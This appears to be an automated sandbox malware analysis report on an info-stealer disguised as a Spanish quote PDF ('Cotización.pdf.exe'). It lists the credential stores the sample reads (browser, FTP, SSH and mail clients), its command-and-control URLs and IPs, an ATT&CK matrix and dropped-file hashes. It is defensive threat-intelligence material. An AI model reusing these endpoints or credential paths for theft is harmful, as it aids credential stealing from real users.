                Source: Yara matchFile source: 16.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.298360317.0000000004697000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Cotizaci#U00f3n.pdf.exe PID: 5436, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Cotizaci#U00f3n.pdf.exe PID: 1724, type: MEMORY
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Tries to harvest and steal ftp login credentialsShow sources
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Tries to steal Mail credentials (via file access)Show sources
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Tries to steal Mail credentials (via file registry)Show sources
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: PopPassword16_2_0040D069
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: SmtpPassword16_2_0040D069
                Source: Yara matchFile source: 16.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Cotizaci#U00f3n.pdf.exe.4738e18.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.298360317.0000000004697000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Cotizaci#U00f3n.pdf.exe PID: 5436, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management InstrumentationPath InterceptionAccess Token Manipulation1Masquerading11OS Credential Dumping2Security Software Discovery111Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Disable or Modify Tools1Credentials in Registry2Process Discovery1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion21Security Account ManagerVirtualization/Sandbox Evasion21SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection112LSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information13DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing2Proc FilesystemSystem Information Discovery13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Cotizaci#U00f3n.pdf.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                0.2.Cotizaci#U00f3n.pdf.exe.4738e18.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                16.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://zamloki.xyz/des/co/tox.php0%Avira URL Cloudsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://www.fontbureau.coma0%URL Reputationsafe
                http://www.fontbureau.coma0%URL Reputationsafe
                http://www.fontbureau.coma0%URL Reputationsafe
                http://www.fontbureau.coma0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                https://zamloki.xyz/des/co/tox.php0%Avira URL Cloudsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.fontbureau.come.comD80%Avira URL Cloudsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                zamloki.xyz
                		104.21.6.222
                		truetrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://zamloki.xyz/des/co/tox.phptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://kbfvzoboss.bid/alien/fre.phptrue
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://alphastand.top/alien/fre.phptrue
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://alphastand.win/alien/fre.phptrue
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://alphastand.trade/alien/fre.phptrue
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://zamloki.xyz/des/co/tox.phptrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.apache.org/licenses/LICENSE-2.0Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.comCotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.com/designersGCotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.com/designers/?Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/bTheCotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers?Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                            		high
                            http://www.ibsensoftware.com/Cotizaci#U00f3n.pdf.exe, Cotizaci#U00f3n.pdf.exe, 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.tiro.comCotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersCotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                              		high
                              http://www.goodfont.co.krCotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.comaCotizaci#U00f3n.pdf.exe, 00000000.00000002.296183312.0000000001B77000.00000004.00000040.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comlCotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.sajatypeworks.comCotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.typography.netDCotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers/cabarga.htmlNCotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                                		high
                                http://www.founder.com.cn/cn/cTheCotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmCotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://fontfabrik.comCotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cnCotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/frere-jones.htmlCotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.jiyu-kobo.co.jp/Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/DPleaseCotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers8Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.fonts.comCotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.sandoll.co.krCotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.urwpp.deDPleaseCotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.zhongyicts.com.cnCotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.come.comD8Cotizaci#U00f3n.pdf.exe, 00000000.00000002.296183312.0000000001B77000.00000004.00000040.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.sakkal.comCotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown

                                      Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public

                                      IPDomainCountryFlagASNASN NameMalicious
                                      172.67.155.45
                                      		unknownUnited States
                                      		13335CLOUDFLARENETUStrue
                                      104.21.6.222
                                      		zamloki.xyzUnited States
                                      		13335CLOUDFLARENETUStrue

                                      Private

                                      IP
                                      192.168.2.1

                                      General Information

                                      Joe Sandbox Version:33.0.0 White Diamond
                                      Analysis ID:449243
                                      Start date:15.07.2021
                                      Start time:12:42:14
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 7m 23s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:Cotizaci#U00f3n.pdf.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:25
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@3/3@135/3
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 23.7% (good quality ratio 22.6%)
                                      • Quality average: 75%
                                      • Quality standard deviation: 28.8%
                                      HCA Information:
                                      • Successful, ratio: 99%
                                      • Number of executed functions: 73
                                      • Number of non-executed functions: 17
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .exe
                                      Warnings:
                                      Show All
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 52.147.198.201, 13.64.90.137, 92.122.145.220, 13.88.21.125, 95.100.54.203, 20.50.102.62, 40.112.88.60, 23.10.249.43, 23.10.249.26
                                      • Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus15.cloudapp.net
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      12:43:49API Interceptor132x Sleep call for process: Cotizaci#U00f3n.pdf.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      No context

                                      ASN

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      CLOUDFLARENETUS3IL88iBPym.exeGet hashmaliciousBrowse
                                      • 172.67.196.36
                                      oOoVvuAQS9.exeGet hashmaliciousBrowse
                                      • 172.67.196.36
                                      6FORhr7lC1.exeGet hashmaliciousBrowse
                                      • 104.21.60.118
                                      u5xgJUljfI.exeGet hashmaliciousBrowse
                                      • 23.227.38.74
                                      ERyRdl8xce.exeGet hashmaliciousBrowse
                                      • 104.21.80.157
                                      bnNew.xlsxGet hashmaliciousBrowse
                                      • 104.21.80.157
                                      product list.docGet hashmaliciousBrowse
                                      • 104.21.19.200
                                      BOQ.docGet hashmaliciousBrowse
                                      • 172.67.169.145
                                      Reversed Invoice KPR2021.docGet hashmaliciousBrowse
                                      • 104.21.27.166
                                      S&P-RFQ #2004668.xlsxGet hashmaliciousBrowse
                                      • 104.21.59.77
                                      bank.doc.exeGet hashmaliciousBrowse
                                      • 172.67.156.203
                                      kNRLjtSR7j.xlsxGet hashmaliciousBrowse
                                      • 104.18.7.156
                                      4fy0Wb1EUX.exeGet hashmaliciousBrowse
                                      • 104.23.98.190
                                      kPRpB5ViRQFsqKE.exeGet hashmaliciousBrowse
                                      • 172.67.188.154
                                      FileLas#0091.exeGet hashmaliciousBrowse
                                      • 104.21.19.200
                                      Request Quotation.exeGet hashmaliciousBrowse
                                      • 172.67.188.154
                                      0c2Em7b36J.exeGet hashmaliciousBrowse
                                      • 104.21.51.99
                                      nRzzu8oOhA.exeGet hashmaliciousBrowse
                                      • 172.67.196.36
                                      htmlattachment.htmGet hashmaliciousBrowse
                                      • 104.16.18.94
                                      htmlattachment111.htmGet hashmaliciousBrowse
                                      • 104.16.19.94
                                      CLOUDFLARENETUS3IL88iBPym.exeGet hashmaliciousBrowse
                                      • 172.67.196.36
                                      oOoVvuAQS9.exeGet hashmaliciousBrowse
                                      • 172.67.196.36
                                      6FORhr7lC1.exeGet hashmaliciousBrowse
                                      • 104.21.60.118
                                      u5xgJUljfI.exeGet hashmaliciousBrowse
                                      • 23.227.38.74
                                      ERyRdl8xce.exeGet hashmaliciousBrowse
                                      • 104.21.80.157
                                      bnNew.xlsxGet hashmaliciousBrowse
                                      • 104.21.80.157
                                      product list.docGet hashmaliciousBrowse
                                      • 104.21.19.200
                                      BOQ.docGet hashmaliciousBrowse
                                      • 172.67.169.145
                                      Reversed Invoice KPR2021.docGet hashmaliciousBrowse
                                      • 104.21.27.166
                                      S&P-RFQ #2004668.xlsxGet hashmaliciousBrowse
                                      • 104.21.59.77
                                      bank.doc.exeGet hashmaliciousBrowse
                                      • 172.67.156.203
                                      kNRLjtSR7j.xlsxGet hashmaliciousBrowse
                                      • 104.18.7.156
                                      4fy0Wb1EUX.exeGet hashmaliciousBrowse
                                      • 104.23.98.190
                                      kPRpB5ViRQFsqKE.exeGet hashmaliciousBrowse
                                      • 172.67.188.154
                                      FileLas#0091.exeGet hashmaliciousBrowse
                                      • 104.21.19.200
                                      Request Quotation.exeGet hashmaliciousBrowse
                                      • 172.67.188.154
                                      0c2Em7b36J.exeGet hashmaliciousBrowse
                                      • 104.21.51.99
                                      nRzzu8oOhA.exeGet hashmaliciousBrowse
                                      • 172.67.196.36
                                      htmlattachment.htmGet hashmaliciousBrowse
                                      • 104.16.18.94
                                      htmlattachment111.htmGet hashmaliciousBrowse
                                      • 104.16.19.94

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Cotizaci#U00f3n.pdf.exe.log
                                      Process:C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.355304211458859
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                      MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                      SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                      SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                      SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                      Malicious:true
                                      Reputation:high, very likely benign file
                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                      C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                                      Process:C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview: 1
                                      C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
